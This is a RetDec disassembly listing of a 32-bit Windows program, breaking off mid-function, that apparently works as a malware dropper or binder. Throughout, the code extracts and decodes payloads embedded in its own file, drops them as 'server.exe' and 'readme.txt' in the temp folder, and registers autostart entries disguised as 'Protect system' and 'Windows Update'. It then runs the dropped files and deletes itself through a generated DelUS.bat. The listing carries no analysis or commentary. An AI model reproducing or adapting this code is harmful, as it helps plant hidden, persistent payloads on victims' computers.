;;
;; This file was generated by the Retargetable Decompiler
;; Website: https://retdec.com
;; Copyright (c) 2022 Retargetable Decompiler <info@retdec.com>
;;
;; Decompilation date: 2022-05-30 17:28:20
;; Architecture: x86
;;

;;
;; Code Segment
;;

; section: .text
; function: function_13141000 at 0x13141000 -- 0x13141008
0x13141000:   55                              	push ebp
0x13141001:   8b ec                           	mov ebp, esp
0x13141003:   83 c4 e4                        	add esp, -0x1c
0x13141006:   eb 55                           	jmp 0x1314105d <function_1314105d>
; data inside code section at 0x13141008 -- 0x1314105b
0x13141008:   44 65 6c 55 53 2e 62 61  74 00                     |DelUS.bat.      |   "DelUS.bat"
0x13141012:   6f 70 65 6e 00                                     |open.           |   "open"
0x13141017:   5c 00                                              |\.              |
0x13141019:   3a 52 65 70 65 61 74 0d  0a 00                     |:Repeat...      |   ":Repeat\r\n"
0x13141023:   64 65 6c 20 22 00                                  |del ".          |   "del \""
0x13141029:   22 00                                              |".              |
0x1314102b:   0d 0a 69 66 20 65 78 69  73 74 20 22 00            |..if exist ".   |   "\r\nif exist \""
0x13141038:   22 20 67 6f 74 6f 20 52  65 70 65 61 74 0d 0a 00   |" goto Repeat...|   "\" goto Repeat\r\n"
0x13141048:   72 6d 64 69 72 20 22 00                            |rmdir ".        |   "rmdir \""
0x13141050:   22 0d 0a 64 65 6c 20 22  00                        |"..del ".       |   "\"\r\ndel \""
0x13141059:   22 0d 0a 00                                        |"...            |   "\"\r\n"
; function: function_1314105b at 0x1314105b -- 0x1314105d
0x1314105b:   0a 00                           	or al, byte ptr [eax]
; function: function_1314105d at 0x1314105d -- 0x131411e7
0x1314105d:   e8 28 07 00 00                  	call 0x1314178a <GetProcessHeap>
0x13141062:   89 45 f4                        	mov dword ptr [ebp - 0xc], eax
0x13141065:   68 f8 07 00 00                  	push 0x7f8
0x1314106a:   6a 00                           	push 0
0x1314106c:   ff 75 f4                        	push dword ptr [ebp - 0xc]
0x1314106f:   e8 22 07 00 00                  	call 0x13141796 <HeapAlloc>
0x13141074:   89 45 ec                        	mov dword ptr [ebp - 0x14], eax
0x13141077:   05 04 01 00 00                  	add eax, 0x104
0x1314107c:   89 45 ec                        	mov dword ptr [ebp - 0x14], eax
0x1314107f:   05 04 01 00 00                  	add eax, 0x104
0x13141084:   89 45 f0                        	mov dword ptr [ebp - 0x10], eax
0x13141087:   05 04 01 00 00                  	add eax, 0x104
0x1314108c:   89 45 e8                        	mov dword ptr [ebp - 0x18], eax
0x1314108f:   05 04 01 00 00                  	add eax, 0x104
0x13141094:   89 45 e4                        	mov dword ptr [ebp - 0x1c], eax
0x13141097:   ff 75 e8                        	push dword ptr [ebp - 0x18]
0x1314109a:   68 04 01 00 00                  	push 0x104
0x1314109f:   e8 ec 06 00 00                  	call 0x13141790 <GetTempPathA>
0x131410a4:   68 08 10 14 13                  	push 0x13141008 ; "DelUS.bat"
0x131410a9:   ff 75 e8                        	push dword ptr [ebp - 0x18]
0x131410ac:   e8 27 07 00 00                  	call 0x131417d8 <lstrcatA>
0x131410b1:   6a 00                           	push 0
0x131410b3:   68 80 00 00 08                  	push 0x8000080
0x131410b8:   6a 02                           	push 2
0x131410ba:   6a 00                           	push 0
0x131410bc:   6a 00                           	push 0
0x131410be:   68 00 00 00 40                  	push 0x40000000
0x131410c3:   ff 75 e8                        	push dword ptr [ebp - 0x18]
0x131410c6:   e8 9b 06 00 00                  	call 0x13141766 <CreateFileA>
0x131410cb:   89 45 fc                        	mov dword ptr [ebp - 4], eax
0x131410ce:   83 7d fc ff                     	cmp dword ptr [ebp - 4], -1
0x131410d2:   0f 84 00 01 00 00               	je 0x131411d8 <function_1314105d+0x17b>
0x131410d8:   68 04 01 00 00                  	push 0x104
0x131410dd:   ff 75 f0                        	push dword ptr [ebp - 0x10]
0x131410e0:   6a 00                           	push 0
0x131410e2:   e8 9d 06 00 00                  	call 0x13141784 <GetModuleFileNameA>
0x131410e7:   ff 75 f0                        	push dword ptr [ebp - 0x10]
0x131410ea:   ff 75 ec                        	push dword ptr [ebp - 0x14]
0x131410ed:   e8 f2 06 00 00                  	call 0x131417e4 <lstrcpyA>
0x131410f2:   8b 55 ec                        	mov edx, dword ptr [ebp - 0x14]
0x131410f5:   8b ca                           	mov ecx, edx
0x131410f7:   8a 02                           	mov al, byte ptr [edx]
0x131410f9:   3c 5c                           	cmp al, 0x5c
0x131410fb:   75 02                           	jne 0x131410ff <function_1314105d+0xa2>
0x131410fd:   8b ca                           	mov ecx, edx
0x131410ff:   42                              	inc edx
0x13141100:   0a c0                           	or al, al
0x13141102:   75 f3                           	jne 0x131410f7 <function_1314105d+0x9a>
0x13141104:   c6 41 01 00                     	mov byte ptr [ecx + 1], 0
0x13141108:   68 19 10 14 13                  	push 0x13141019 ; ":Repeat\r\n"
0x1314110d:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141110:   e8 c3 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141115:   68 23 10 14 13                  	push 0x13141023 ; "del \""
0x1314111a:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314111d:   e8 b6 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141122:   ff 75 f0                        	push dword ptr [ebp - 0x10]
0x13141125:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141128:   e8 ab 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314112d:   68 29 10 14 13                  	push 0x13141029
0x13141132:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141135:   e8 9e 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314113a:   68 2b 10 14 13                  	push 0x1314102b ; "\r\nif exist \""
0x1314113f:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141142:   e8 91 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141147:   ff 75 f0                        	push dword ptr [ebp - 0x10]
0x1314114a:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314114d:   e8 86 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141152:   68 38 10 14 13                  	push 0x13141038 ; "\" goto Repeat\r\n"
0x13141157:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314115a:   e8 79 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314115f:   68 48 10 14 13                  	push 0x13141048 ; "rmdir \""
0x13141164:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141167:   e8 6c 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314116c:   ff 75 ec                        	push dword ptr [ebp - 0x14]
0x1314116f:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141172:   e8 61 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141177:   68 50 10 14 13                  	push 0x13141050 ; "\"\r\ndel \""
0x1314117c:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314117f:   e8 54 06 00 00                  	call 0x131417d8 <lstrcatA>
0x13141184:   ff 75 e8                        	push dword ptr [ebp - 0x18]
0x13141187:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314118a:   e8 49 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314118f:   68 59 10 14 13                  	push 0x13141059 ; "\"\r\n"
0x13141194:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x13141197:   e8 3c 06 00 00                  	call 0x131417d8 <lstrcatA>
0x1314119c:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x1314119f:   e8 46 06 00 00                  	call 0x131417ea <lstrlenA>
0x131411a4:   89 45 f8                        	mov dword ptr [ebp - 8], eax
0x131411a7:   6a 00                           	push 0
0x131411a9:   8d 45 f8                        	lea eax, [ebp - 8]
0x131411ac:   50                              	push eax
0x131411ad:   ff 75 f8                        	push dword ptr [ebp - 8]
0x131411b0:   ff 75 e4                        	push dword ptr [ebp - 0x1c]
0x131411b3:   ff 75 fc                        	push dword ptr [ebp - 4]
0x131411b6:   e8 ff 05 00 00                  	call 0x131417ba <WriteFile>
0x131411bb:   ff 75 fc                        	push dword ptr [ebp - 4]
0x131411be:   e8 97 05 00 00                  	call 0x1314175a <CloseHandle>
0x131411c3:   6a 00                           	push 0
0x131411c5:   6a 00                           	push 0
0x131411c7:   6a 00                           	push 0
0x131411c9:   ff 75 e8                        	push dword ptr [ebp - 0x18]
0x131411cc:   68 12 10 14 13                  	push 0x13141012 ; "open"
0x131411d1:   6a 00                           	push 0
0x131411d3:   e8 18 06 00 00                  	call 0x131417f0 <ShellExecuteA>
0x131411d8:   ff 75 ec                        	push dword ptr [ebp - 0x14]
0x131411db:   6a 00                           	push 0
0x131411dd:   ff 75 f4                        	push dword ptr [ebp - 0xc]
0x131411e0:   e8 b7 05 00 00                  	call 0x1314179c <HeapFree>
0x131411e5:   c9                              	leave 
0x131411e6:   c3                              	ret 
; function: entry_point at 0x131411e7 -- 0x131414c1
0x131411e7:   68 1c 3b 14 13                  	push 0x13143b1c
0x131411ec:   68 00 01 00 00                  	push 0x100
0x131411f1:   e8 82 05 00 00                  	call 0x13141778 <GetCurrentDirectoryA>
0x131411f6:   68 1c 3c 14 13                  	push 0x13143c1c
0x131411fb:   68 00 01 00 00                  	push 0x100
0x13141200:   e8 8b 05 00 00                  	call 0x13141790 <GetTempPathA>
0x13141205:   68 1c 3d 14 13                  	push 0x13143d1c
0x1314120a:   68 00 01 00 00                  	push 0x100
0x1314120f:   e8 7c 05 00 00                  	call 0x13141790 <GetTempPathA>
0x13141214:   68 23 30 14 13                  	push 0x13143023
0x13141219:   68 1c 3b 14 13                  	push 0x13143b1c
0x1314121e:   e8 b5 05 00 00                  	call 0x131417d8 <lstrcatA>
0x13141223:   68 25 30 14 13                  	push 0x13143025 ; "server.exe"
0x13141228:   68 1c 3b 14 13                  	push 0x13143b1c
0x1314122d:   e8 a6 05 00 00                  	call 0x131417d8 <lstrcatA>
0x13141232:   68 51 30 14 13                  	push 0x13143051 ; "readme.txt"
0x13141237:   68 1c 3c 14 13                  	push 0x13143c1c
0x1314123c:   e8 97 05 00 00                  	call 0x131417d8 <lstrcatA>
0x13141241:   68 25 30 14 13                  	push 0x13143025 ; "server.exe"
0x13141246:   68 1c 3d 14 13                  	push 0x13143d1c
0x1314124b:   e8 88 05 00 00                  	call 0x131417d8 <lstrcatA>
0x13141250:   68 1c 3b 14 13                  	push 0x13143b1c
0x13141255:   e8 12 05 00 00                  	call 0x1314176c <DeleteFileA>
0x1314125a:   68 1c 3c 14 13                  	push 0x13143c1c
0x1314125f:   e8 08 05 00 00                  	call 0x1314176c <DeleteFileA>
0x13141264:   68 1c 3d 14 13                  	push 0x13143d1c
0x13141269:   e8 fe 04 00 00                  	call 0x1314176c <DeleteFileA>
0x1314126e:   68 00 01 00 00                  	push 0x100
0x13141273:   68 1c 3a 14 13                  	push 0x13143a1c
0x13141278:   6a 00                           	push 0
0x1314127a:   e8 05 05 00 00                  	call 0x13141784 <GetModuleFileNameA>
0x1314127f:   c7 05 f8 34 14 13 64 19 00 00   	mov dword ptr [0x131434f8], 0x1964
0x13141289:   e8 77 03 00 00                  	call 0x13141605 <function_13141605>
0x1314128e:   a1 f8 34 14 13                  	mov eax, dword ptr [0x131434f8]
0x13141293:   a3 20 3e 14 13                  	mov dword ptr [0x13143e20], eax
0x13141298:   c7 05 f8 34 14 13 10 27 00 00   	mov dword ptr [0x131434f8], 0x2710
0x131412a2:   e8 5e 03 00 00                  	call 0x13141605 <function_13141605>
0x131412a7:   a1 f8 34 14 13                  	mov eax, dword ptr [0x131434f8]
0x131412ac:   a3 70 3e 14 13                  	mov dword ptr [0x13143e70], eax
0x131412b1:   a1 70 3e 14 13                  	mov eax, dword ptr [0x13143e70]
0x131412b6:   48                              	dec eax
0x131412b7:   48                              	dec eax
0x131412b8:   48                              	dec eax
0x131412b9:   48                              	dec eax
0x131412ba:   48                              	dec eax
0x131412bb:   48                              	dec eax
0x131412bc:   48                              	dec eax
0x131412bd:   48                              	dec eax
0x131412be:   a3 c0 3e 14 13                  	mov dword ptr [0x13143ec0], eax
0x131412c3:   c7 05 1c 3e 14 13 01 00 00 00   	mov dword ptr [0x13143e1c], 1
0x131412cd:   e8 ef 01 00 00                  	call 0x131414c1 <function_131414c1>
0x131412d2:   83 3d 8a 30 14 13 01            	cmp dword ptr [0x1314308a], 1
0x131412d9:   0f 85 93 00 00 00               	jne 0x13141372 <entry_point+0x18b>
0x131412df:   83 3d 9a 30 14 13 01            	cmp dword ptr [0x1314309a], 1
0x131412e6:   74 46                           	je 0x1314132e <entry_point+0x147>
0x131412e8:   68 28 40 14 13                  	push 0x13144028
0x131412ed:   68 06 00 02 00                  	push 0x20006
0x131412f2:   6a 00                           	push 0
0x131412f4:   68 c8 30 14 13                  	push 0x131430c8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
0x131412f9:   68 02 00 00 80                  	push 0x80000002
0x131412fe:   e8 f9 04 00 00                  	call 0x131417fc <RegOpenKeyExA>
0x13141303:   68 a1 00 00 00                  	push 0xa1
0x13141308:   68 1c 3d 14 13                  	push 0x13143d1c
0x1314130d:   6a 01                           	push 1
0x1314130f:   6a 00                           	push 0
0x13141311:   68 9e 30 14 13                  	push 0x1314309e ; "Protect system"
0x13141316:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x1314131c:   e8 e1 04 00 00                  	call 0x13141802 <RegSetValueExA>
0x13141321:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x13141327:   e8 ca 04 00 00                  	call 0x131417f6 <RegCloseKey>
0x1314132c:   eb 44                           	jmp 0x13141372 <entry_point+0x18b>
0x1314132e:   68 28 40 14 13                  	push 0x13144028
0x13141333:   68 06 00 02 00                  	push 0x20006
0x13141338:   6a 00                           	push 0
0x1314133a:   68 c8 30 14 13                  	push 0x131430c8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
0x1314133f:   68 02 00 00 80                  	push 0x80000002
0x13141344:   e8 b3 04 00 00                  	call 0x131417fc <RegOpenKeyExA>
0x13141349:   68 a1 00 00 00                  	push 0xa1
0x1314134e:   68 1c 3b 14 13                  	push 0x13143b1c
0x13141353:   6a 01                           	push 1
0x13141355:   6a 00                           	push 0
0x13141357:   68 9e 30 14 13                  	push 0x1314309e ; "Protect system"
0x1314135c:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x13141362:   e8 9b 04 00 00                  	call 0x13141802 <RegSetValueExA>
0x13141367:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x1314136d:   e8 84 04 00 00                  	call 0x131417f6 <RegCloseKey>
0x13141372:   6a 00                           	push 0
0x13141374:   68 1c 3d 14 13                  	push 0x13143d1c
0x13141379:   68 1c 3b 14 13                  	push 0x13143b1c
0x1314137e:   e8 dd 03 00 00                  	call 0x13141760 <CopyFileA>
0x13141383:   83 3d 9a 30 14 13 00            	cmp dword ptr [0x1314309a], 0
0x1314138a:   75 0a                           	jne 0x13141396 <entry_point+0x1af>
0x1314138c:   68 1c 3b 14 13                  	push 0x13143b1c
0x13141391:   e8 d6 03 00 00                  	call 0x1314176c <DeleteFileA>
0x13141396:   83 3d 92 30 14 13 01            	cmp dword ptr [0x13143092], 1
0x1314139d:   74 04                           	je 0x131413a3 <entry_point+0x1bc>
0x1314139f:   eb 3f                           	jmp 0x131413e0 <entry_point+0x1f9>
0x131413a1:   eb 05                           	jmp 0x131413a8 <entry_point+0x1c1>
0x131413a3:   e8 77 03 00 00                  	call 0x1314171f <function_1314171f>
0x131413a8:   68 86 30 14 13                  	push 0x13143086 ; "exe"
0x131413ad:   68 24 3f 14 13                  	push 0x13143f24
0x131413b2:   e8 27 04 00 00                  	call 0x131417de <lstrcmpiA>
0x131413b7:   0b c0                           	or eax, eax
0x131413b9:   74 19                           	je 0x131413d4 <entry_point+0x1ed>
0x131413bb:   6a 05                           	push 5
0x131413bd:   6a 00                           	push 0
0x131413bf:   6a 00                           	push 0
0x131413c1:   68 1c 3d 14 13                  	push 0x13143d1c
0x131413c6:   68 00 30 14 13                  	push 0x13143000 ; "open"
0x131413cb:   6a 00                           	push 0
0x131413cd:   e8 1e 04 00 00                  	call 0x131417f0 <ShellExecuteA>
0x131413d2:   eb 0c                           	jmp 0x131413e0 <entry_point+0x1f9>
0x131413d4:   6a 05                           	push 5
0x131413d6:   68 1c 3d 14 13                  	push 0x13143d1c
0x131413db:   e8 d4 03 00 00                  	call 0x131417b4 <WinExec>
0x131413e0:   c7 05 1c 3e 14 13 02 00 00 00   	mov dword ptr [0x13143e1c], 2
0x131413ea:   e8 d2 00 00 00                  	call 0x131414c1 <function_131414c1>
0x131413ef:   83 3d 8e 30 14 13 01            	cmp dword ptr [0x1314308e], 1
0x131413f6:   75 44                           	jne 0x1314143c <entry_point+0x255>
0x131413f8:   68 28 40 14 13                  	push 0x13144028
0x131413fd:   68 06 00 02 00                  	push 0x20006
0x13141402:   6a 00                           	push 0
0x13141404:   68 c8 30 14 13                  	push 0x131430c8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
0x13141409:   68 02 00 00 80                  	push 0x80000002
0x1314140e:   e8 e9 03 00 00                  	call 0x131417fc <RegOpenKeyExA>
0x13141413:   68 a1 00 00 00                  	push 0xa1
0x13141418:   68 1c 3c 14 13                  	push 0x13143c1c
0x1314141d:   6a 01                           	push 1
0x1314141f:   6a 00                           	push 0
0x13141421:   68 b3 30 14 13                  	push 0x131430b3 ; "Windows Update"
0x13141426:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x1314142c:   e8 d1 03 00 00                  	call 0x13141802 <RegSetValueExA>
0x13141431:   ff 35 28 40 14 13               	push dword ptr [0x13144028]
0x13141437:   e8 ba 03 00 00                  	call 0x131417f6 <RegCloseKey>
0x1314143c:   83 3d 96 30 14 13 01            	cmp dword ptr [0x13143096], 1
0x13141443:   74 17                           	je 0x1314145c <entry_point+0x275>
0x13141445:   83 3d 9a 30 14 13 01            	cmp dword ptr [0x1314309a], 1
0x1314144c:   75 05                           	jne 0x13141453 <entry_point+0x26c>
0x1314144e:   e8 ad fb ff ff                  	call 0x13141000 <function_13141000>
0x13141453:   6a 00                           	push 0
0x13141455:   e8 18 03 00 00                  	call 0x13141772 <ExitProcess>
0x1314145a:   eb 05                           	jmp 0x13141461 <entry_point+0x27a>
0x1314145c:   e8 be 02 00 00                  	call 0x1314171f <function_1314171f>
0x13141461:   68 86 30 14 13                  	push 0x13143086 ; "exe"
0x13141466:   68 24 3f 14 13                  	push 0x13143f24
0x1314146b:   e8 6e 03 00 00                  	call 0x131417de <lstrcmpiA>
0x13141470:   0b c0                           	or eax, eax
0x13141472:   74 2c                           	je 0x131414a0 <entry_point+0x2b9>
0x13141474:   6a 05                           	push 5
0x13141476:   6a 00                           	push 0
0x13141478:   6a 00                           	push 0
0x1314147a:   68 1c 3c 14 13                  	push 0x13143c1c
0x1314147f:   68 00 30 14 13                  	push 0x13143000 ; "open"
0x13141484:   6a 00                           	push 0
0x13141486:   e8 65 03 00 00                  	call 0x131417f0 <ShellExecuteA>
0x1314148b:   83 3d 9a 30 14 13 01            	cmp dword ptr [0x1314309a], 1
0x13141492:   75 05                           	jne 0x13141499 <entry_point+0x2b2>
0x13141494:   e8 67 fb ff ff                  	call 0x13141000 <function_13141000>
0x13141499:   6a 00                           	push 0
0x1314149b:   e8 d2 02 00 00                  	call 0x13141772 <ExitProcess>
0x131414a0:   6a 05                           	push 5
0x131414a2:   68 1c 3c 14 13                  	push 0x13143c1c
0x131414a7:   e8 08 03 00 00                  	call 0x131417b4 <WinExec>
0x131414ac:   83 3d 9a 30 14 13 01            	cmp dword ptr [0x1314309a], 1
0x131414b3:   75 05                           	jne 0x131414ba <entry_point+0x2d3>
0x131414b5:   e8 46 fb ff ff                  	call 0x13141000 <function_13141000>
0x131414ba:   6a 00                           	push 0
0x131414bc:   e8 b1 02 00 00                  	call 0x13141772 <ExitProcess>
; function: function_131414c1 at 0x131414c1 -- 0x13141605
0x131414c1:   83 3d 1c 3e 14 13 01            	cmp dword ptr [0x13143e1c], 1
0x131414c8:   75 2b                           	jne 0x131414f5 <function_131414c1+0x34>
0x131414ca:   6a 00                           	push 0
0x131414cc:   68 80 00 00 00                  	push 0x80
0x131414d1:   6a 02                           	push 2
0x131414d3:   6a 00                           	push 0
0x131414d5:   6a 01                           	push 1
0x131414d7:   68 00 00 00 40                  	push 0x40000000
0x131414dc:   68 1c 3b 14 13                  	push 0x13143b1c
0x131414e1:   e8 80 02 00 00                  	call 0x13141766 <CreateFileA>
0x131414e6:   a3 14 36 14 13                  	mov dword ptr [0x13143614], eax
0x131414eb:   a1 20 3e 14 13                  	mov eax, dword ptr [0x13143e20]
0x131414f0:   a3 f8 34 14 13                  	mov dword ptr [0x131434f8], eax
0x131414f5:   83 3d 1c 3e 14 13 02            	cmp dword ptr [0x13143e1c], 2
0x131414fc:   75 2b                           	jne 0x13141529 <function_131414c1+0x68>
0x131414fe:   6a 00                           	push 0
0x13141500:   68 80 00 00 00                  	push 0x80
0x13141505:   6a 01                           	push 1
0x13141507:   6a 00                           	push 0
0x13141509:   6a 01                           	push 1
0x1314150b:   68 00 00 00 40                  	push 0x40000000
0x13141510:   68 1c 3c 14 13                  	push 0x13143c1c
0x13141515:   e8 4c 02 00 00                  	call 0x13141766 <CreateFileA>
0x1314151a:   a3 14 36 14 13                  	mov dword ptr [0x13143614], eax
0x1314151f:   a1 70 3e 14 13                  	mov eax, dword ptr [0x13143e70]
0x13141524:   a3 f8 34 14 13                  	mov dword ptr [0x131434f8], eax
0x13141529:   83 3d 14 36 14 13 ff            	cmp dword ptr [0x13143614], -1
0x13141530:   75 01                           	jne 0x13141533 <function_131414c1+0x72>
0x13141532:   c3                              	ret 
0x13141533:   6a 02                           	push 2
0x13141535:   6a 00                           	push 0
0x13141537:   6a 00                           	push 0
0x13141539:   ff 35 14 36 14 13               	push dword ptr [0x13143614]
0x1314153f:   e8 6a 02 00 00                  	call 0x131417ae <SetFilePointer>
0x13141544:   6a 00                           	push 0
0x13141546:   68 1c 3a 14 13                  	push 0x13143a1c
0x1314154b:   e8 7c 02 00 00                  	call 0x131417cc <_lopen>
0x13141550:   83 f8 ff                        	cmp eax, -1
0x13141553:   0f 84 ab 00 00 00               	je 0x13141604 <function_131414c1+0x143>
0x13141559:   a3 7e 30 14 13                  	mov dword ptr [0x1314307e], eax
0x1314155e:   6a 00                           	push 0
0x13141560:   6a 00                           	push 0
0x13141562:   ff 35 f8 34 14 13               	push dword ptr [0x131434f8]
0x13141568:   ff 35 7e 30 14 13               	push dword ptr [0x1314307e]
0x1314156e:   e8 3b 02 00 00                  	call 0x131417ae <SetFilePointer>
0x13141573:   6a 01                           	push 1
0x13141575:   6a 00                           	push 0
0x13141577:   ff 35 7e 30 14 13               	push dword ptr [0x1314307e]
0x1314157d:   e8 44 02 00 00                  	call 0x131417c6 <_llseek>
0x13141582:   83 3d 1c 3e 14 13 01            	cmp dword ptr [0x13143e1c], 1
0x13141589:   75 1f                           	jne 0x131415aa <function_131414c1+0xe9>
0x1314158b:   3b 05 c0 3e 14 13               	cmp eax, dword ptr [0x13143ec0]
0x13141591:   75 17                           	jne 0x131415aa <function_131414c1+0xe9>
0x13141593:   ff 35 14 36 14 13               	push dword ptr [0x13143614]
0x13141599:   e8 bc 01 00 00                  	call 0x1314175a <CloseHandle>
0x1314159e:   ff 35 7e 30 14 13               	push dword ptr [0x1314307e]
0x131415a4:   e8 17 02 00 00                  	call 0x131417c0 <_lclose>
0x131415a9:   c3                              	ret 
0x131415aa:   6a 01                           	push 1
0x131415ac:   68 7d 30 14 13                  	push 0x1314307d
0x131415b1:   ff 35 7e 30 14 13               	push dword ptr [0x1314307e]
0x131415b7:   e8 16 02 00 00                  	call 0x131417d2 <_lread>
0x131415bc:   a3 10 3f 14 13                  	mov dword ptr [0x13143f10], eax
0x131415c1:   83 3d 10 3f 14 13 01            	cmp dword ptr [0x13143f10], 1
0x131415c8:   73 17                           	jae 0x131415e1 <function_131414c1+0x120>
0x131415ca:   ff 35 14 36 14 13               	push dword ptr [0x13143614]
0x131415d0:   e8 85 01 00 00                  	call 0x1314175a <CloseHandle>
0x131415d5:   ff 35 7e 30 14 13               	push dword ptr [0x1314307e]
0x131415db:   e8 e0 01 00 00                  	call 0x131417c0 <_lclose>
0x131415e0:   c3                              	ret 
0x131415e1:   e8 2b 01 00 00                  	call 0x13141711 <function_13141711>
0x131415e6:   6a 00                           	push 0
0x131415e8:   68 18 36 14 13                  	push 0x13143618
0x131415ed:   6a 01                           	push 1
0x131415ef:   68 7d 30 14 13                  	push 0x1314307d
0x131415f4:   ff 35 14 36 14 13               	push dword ptr [0x13143614]
0x131415fa:   e8 bb 01 00 00                  	call 0x131417ba <WriteFile>
0x131415ff:   e9 6f ff ff ff                  	jmp 0x13141573 <function_131414c1+0xb2>
0x13141604:   c3                              	ret 
; function: function_13141605 at 0x13141605 -- 0x1314170a
0x13141605:   6a 00                           	push 0
0x13141607:   68 1c 3a 14 13                  	push 0x13143a1c
0x1314160c:   e8 bb 01 00 00                  	call 0x131417cc <_lopen>
0x13141611:   83 3d e8 35 14 13 ff            	cmp dword ptr [0x131435e8], -1
0x13141618:   0f 84 e5 00 00 00               	je 0x13141703 <function_13141605+0xfe>
0x1314161e:   a3 e8 35 14 13                  	mov dword ptr [0x131435e8], eax
0x13141623:   66 c7 05 0b 30 14 13 01 00      	mov word ptr [0x1314300b], 1
0x1314162c:   6a 00                           	push 0
0x1314162e:   ff 35 e8 35 14 13               	push dword ptr [0x131435e8]
0x13141634:   e8 45 01 00 00                  	call 0x1314177e <GetFileSize>
0x13141639:   a3 ec 35 14 13                  	mov dword ptr [0x131435ec], eax
0x1314163e:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x13141644:   a1 f8 34 14 13                  	mov eax, dword ptr [0x131434f8]
0x13141649:   3b 05 ec 35 14 13               	cmp eax, dword ptr [0x131435ec]
0x1314164f:   72 01                           	jb 0x13141652 <function_13141605+0x4d>
0x13141651:   c3                              	ret 
0x13141652:   0b c0                           	or eax, eax
0x13141654:   75 01                           	jne 0x13141657 <function_13141605+0x52>
0x13141656:   c3                              	ret 
0x13141657:   6a 00                           	push 0
0x13141659:   6a 00                           	push 0
0x1314165b:   ff 35 f8 34 14 13               	push dword ptr [0x131434f8]
0x13141661:   ff 35 e8 35 14 13               	push dword ptr [0x131435e8]
0x13141667:   e8 42 01 00 00                  	call 0x131417ae <SetFilePointer>
0x1314166c:   6a 00                           	push 0
0x1314166e:   68 1f 30 14 13                  	push 0x1314301f
0x13141673:   6a 04                           	push 4
0x13141675:   68 48 35 14 13                  	push 0x13143548
0x1314167a:   ff 35 e8 35 14 13               	push dword ptr [0x131435e8]
0x13141680:   e8 1d 01 00 00                  	call 0x131417a2 <ReadFile>
0x13141685:   81 3d 48 35 14 13 66 69 6e 69   	cmp dword ptr [0x13143548], 0x696e6966
0x1314168f:   75 6d                           	jne 0x131416fe <function_13141605+0xf9>
0x13141691:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x13141697:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x1314169d:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416a3:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416a9:   6a 00                           	push 0
0x131416ab:   68 1f 30 14 13                  	push 0x1314301f
0x131416b0:   6a 04                           	push 4
0x131416b2:   68 48 35 14 13                  	push 0x13143548
0x131416b7:   ff 35 e8 35 14 13               	push dword ptr [0x131435e8]
0x131416bd:   e8 e0 00 00 00                  	call 0x131417a2 <ReadFile>
0x131416c2:   81 3d 48 35 14 13 66 69 6e 69   	cmp dword ptr [0x13143548], 0x696e6966
0x131416cc:   75 30                           	jne 0x131416fe <function_13141605+0xf9>
0x131416ce:   6a 78                           	push 0x78
0x131416d0:   68 48 35 14 13                  	push 0x13143548
0x131416d5:   e8 ce 00 00 00                  	call 0x131417a8 <RtlZeroMemory>
0x131416da:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416e0:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416e6:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416ec:   ff 05 f8 34 14 13               	inc dword ptr [0x131434f8]
0x131416f2:   ff 35 e8 35 14 13               	push dword ptr [0x131435e8]
0x131416f8:   e8 5d 00 00 00                  	call 0x1314175a <CloseHandle>
0x131416fd:   c3                              	ret 
0x131416fe:   e9 3b ff ff ff                  	jmp 0x1314163e <function_13141605+0x39>
0x13141703:   6a 00                           	push 0
0x13141705:   e8 68 00 00 00                  	call 0x13141772 <ExitProcess>
; function: function_1314170a at 0x1314170a -- 0x13141711
0x1314170a:   6a 00                           	push 0
0x1314170c:   e8 61 00 00 00                  	call 0x13141772 <ExitProcess>
; function: function_13141711 at 0x13141711 -- 0x13141718
0x13141711:   fe 0d 7d 30 14 13               	dec byte ptr [0x1314307d]
0x13141717:   c3                              	ret 
; function: function_13141718 at 0x13141718 -- 0x1314171f
0x13141718:   fe 0d f8 30 14 13               	dec byte ptr [0x131430f8]
0x1314171e:   c3                              	ret 
; function: function_1314171f at 0x1314171f -- 0x13141759
0x1314171f:   56                              	push esi
0x13141720:   57                              	push edi
0x13141721:   53                              	push ebx
0x13141722:   50                              	push eax
0x13141723:   83 3d 1c 3e 14 13 01            	cmp dword ptr [0x13143e1c], 1
0x1314172a:   75 07                           	jne 0x13141733 <function_1314171f+0x14>
0x1314172c:   be 1c 3b 14 13                  	mov esi, 0x13143b1c
0x13141731:   eb 05                           	jmp 0x13141738 <function_1314171f+0x19>
